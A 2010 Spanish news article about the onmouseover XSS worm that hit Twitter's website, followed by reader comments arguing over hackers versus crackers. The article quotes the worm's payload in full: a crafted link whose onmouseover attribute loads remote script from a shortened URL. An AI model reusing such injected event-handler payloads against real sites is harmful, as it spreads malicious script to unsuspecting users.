Un fallo de seguridad genera el caos en Twitter

La página de microblogging mostraba gráficos de gran tamaño o mensajes sin sentido repletos de códigos

PÚBLICO.ES Madrid 21/09/2010 14:37 Actualizado: 21/09/2010 18:27

Aspecto actual de Twitter.

Aspecto actual de Twitter.

Un fallo de seguridad en la red social Twitter ha provocado hoy que miles de cuentas del servicio de microblogging redirijan a páginas de terceras partes o abran ventanas emergentes (pop-ups) hacia otras webs pornográficas y de juegos.

Según publica el servicio de microblogs en su página oficial, el ataque ya ha sido identificado y solucionado, sobre las 16.20 horas. "Hemos identificado y parcheado un ataque XSS y esperamos que esté totalmente desplegado en breve". 

Los usuarios tan sólo tenían que pasar el ratón por un enlace, sin necesidad de pinchar en él, para que sea abrieran dichas páginas.

La vulnerabilidad permitía, con la introducción de un código JavaScript ('onmouseover') en una URL tuiteada, que se generara un mensaje especial. Una vez que otro usuario pasa el ratón por encima del mensaje, éste se reenviaba automáticamente.

El virus podía detectarse por el siguiente enlace: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:u002fu002fis.gdu002ffl9A7'). Además, no era el único error: la web  mostraba también gráficos de gran tamaño o mensajes sin sentido repletos de códigos. Algunos mensajes eran meras manchas negras.

Afortunadamente, el bug o fallo de seguridad sólo afectó a la página web de Twitter. Los servicios de terceras partes, como Tweedeck o UberTwitter, se mantuvieron inmunes.

Cómo prevenir problemas

Como medida de preocupación se recomendó no abrir la página de Twitter hasta que el problema estuviera subsanado.

Precisamente la semana pasada Twitter se rediseñó con la intención de que sus usuarios permanezcan durante más tiempo en sus páginas, uno de los factores más perseguidos por los responsables de las redes sociales y que se asocia a las posibilidades publicitarias.

5 Comentarios
  • amoskao
    #1 Vota Vota

    -22 i amoskao 21-09-2010 15:18

    Comentario oculto por la valoración de los lectores
    (ver comentario)

    Pues esta mañana mientras tuiteaba se ha portado bien. Sin problema. Es mejor que el facebook. Más sencilla. Y sin gente tan pesad.

    Lo que cansa un poco es la ballenita, cuando indica que está llena de tuits y que tienes que esperar.

    Desde luego los useños saben hacer bien su trabajo.

    MADRID ocio gratis: http://www.madridgratis.net

  • Brainstorm
    #2 Vota Vota

    -10 i Brainstorm 21-09-2010 15:23

    Otra gracia de los Hackers. A ver si así la gente se da cuenta que no son Robin Hood sino que son como las termitas que buscan como entrar en tu casa para demolerla. Twittter puede pagar la factura -seguramente enorme- para arreglar eso pero las PYMEs que viven de Internet no disponen de tanto dinero.

  • El Tranvia del Prado
    #3 Vota Vota

    14 i El Tranvia del Prado 21-09-2010 17:26

    #2 Brainstorm; ¿qué sabe ud. de hackers? Esta palabra es un neologismo utilizado para referirse a un experto en las telecomunicaciones. El conocimiento que poseen estos atacantes/defensores va más allá que el de operarios/técnicos, ya que tienen la habilidad de razonar igual o mejor que muchos de los programas o aplicaciones, Y esto en realidad no es tan ilógico, ya que las computadoras y las utilidades que se encuentran instaladas en ellas fueron creadas por personas como éstas: auténticos ingenieros.

    Otra cosa son los "crackers": cracker viene del inglés "crack" (romper) y justamente es lo que hacen. Saben menos que los hackers pero lo justo para fastidiar y no conocen ninguna ética.Por consiguiente, no les importa romper una arquitectura o sistema una vez dentro, ni tampoco borrar, modificar o falsificar algo. "Los hackers son buenos; los crackers, malos", dice una leyenda del mundillo informático profundo. Yo mismo, desde mi humilde PC, he comprobado que esta web de Público está expuesta a ataques XSS. Gente buena o mala las hay en todos los órdenes de la vida y a los hackers sólo les falta ser reconocidos como un gremio legal. De hecho ya lo son en secreto, pues los mejores trabajan para los gobiernos, para hackear cosas militares o políticas, ya me entiendes... Lo del Twitter es una gamberrada de un aprendiz de 3ª división, como lo son los que programaron la seguridad de esta web. Utilizar robots es muy fácil para programar pero los hackers son los que inventan esos robots...

  • Cominterno
    #4 Vota Vota

    10 i Cominterno 21-09-2010 17:53

    Yo entiendo más a los hackers como gente que busca superarse. Simplemente buscan nuevos retos y no es gente que simplemente sabe programar. Ha de saber de todo para poder ingeniárselas y entrar en sitios con altos grados de seguridad (por poner un ejemplo). Ellos son los que avisan de fallos de seguridad, y esa es la rama más compleja que existe dentro de la informática y es por eso, como bien ha dicho El Travia que normalmente acaban trabajando en grandes empresas o en gobiernos.

  • MissKatzen
    #5 Vota Vota

    4 i MissKatzen 21-09-2010 21:53

    Brainstorm, mejor sería que hablase usted de lo que sabe y por lo visto del concepto hacker vs. cracker no tiene ni idea. Léase los comentarios de El Tranvia del Prado y Cominterno, en ellos podrá entender el significado de cada uno. Seguridad? Verdad que no dejaría la puerta de su domicilio legal abierta? Verdad que contrataría una empresa de seguridad, o si más no un buen cerrajero? Pues lo mismo.

    Amosako, éste no es un sitio para hacer publicidad, la puede hacer creando un usuario de empresa en FB.

Cargando...

Cargando

Generado: 2012-05-28 22:40:12